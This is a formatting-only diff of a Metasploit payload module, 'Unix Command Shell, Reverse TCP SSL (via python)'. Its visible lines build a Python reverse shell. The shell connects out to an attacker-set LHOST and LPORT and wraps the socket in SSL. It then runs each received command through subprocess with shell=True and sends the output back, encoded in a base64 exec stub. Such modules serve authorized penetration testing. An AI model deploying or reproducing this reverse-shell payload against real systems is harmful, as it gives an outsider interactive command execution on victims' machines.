@@ -3,9 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 module MetasploitModule
-
   CachedSize = :dynamic
 
   include Msf::Payload::Single
@@ -13,23 +11,25 @@ module MetasploitModule
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
-    super(merge_info(info,
-     'Name'          => 'Unix Command Shell, Reverse TCP SSL (via python)',
-     'Description'   => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.',
-     'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
-     'License'       => BSD_LICENSE,
-     'Platform'      => 'unix',
-     'Arch'          => ARCH_CMD,
-     'Handler'       => Msf::Handler::ReverseTcpSsl,
-     'Session'       => Msf::Sessions::CommandShell,
-     'PayloadType'   => 'cmd',
-     'RequiredCmd'   => 'python',
-     'Payload'       =>
-       {
-         'Offsets' => { },
-         'Payload' => ''
-       }
-    ))
+    super(
+      merge_info(
+        info,
+        'Name' => 'Unix Command Shell, Reverse TCP SSL (via python)',
+        'Description' => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.',
+        'Author' => 'RageLtMan <rageltman[at]sempervictus>',
+        'License' => BSD_LICENSE,
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Handler' => Msf::Handler::ReverseTcpSsl,
+        'Session' => Msf::Sessions::CommandShell,
+        'PayloadType' => 'cmd',
+        'RequiredCmd' => 'python',
+        'Payload' => {
+          'Offsets' => {},
+          'Payload' => ''
+        }
+      )
+    )
     register_advanced_options(
       [
         OptString.new('PythonPath', [true, 'The path to the Python executable', 'python'])
@@ -54,7 +54,7 @@ module MetasploitModule
     # Set up the socket
     cmd += "import socket,subprocess,os,ssl\n"
     cmd += "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
-    cmd += "so.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
+    cmd += "so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))\n"
     cmd += "s=ssl.wrap_socket(so)\n"
     # The actual IO
     cmd += "#{dead}=False\n"
@@ -64,6 +64,6 @@ module MetasploitModule
     cmd += "\tproc=subprocess.Popen(data.decode('utf-8'),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
     cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
     cmd += "\ts.send(stdout_value)\n"
-    "#{datastore['PythonPath']} -c \"#{ py_create_exec_stub(cmd) }\""
+    "#{datastore['PythonPath']} -c \"#{py_create_exec_stub(cmd)}\""
   end
 end
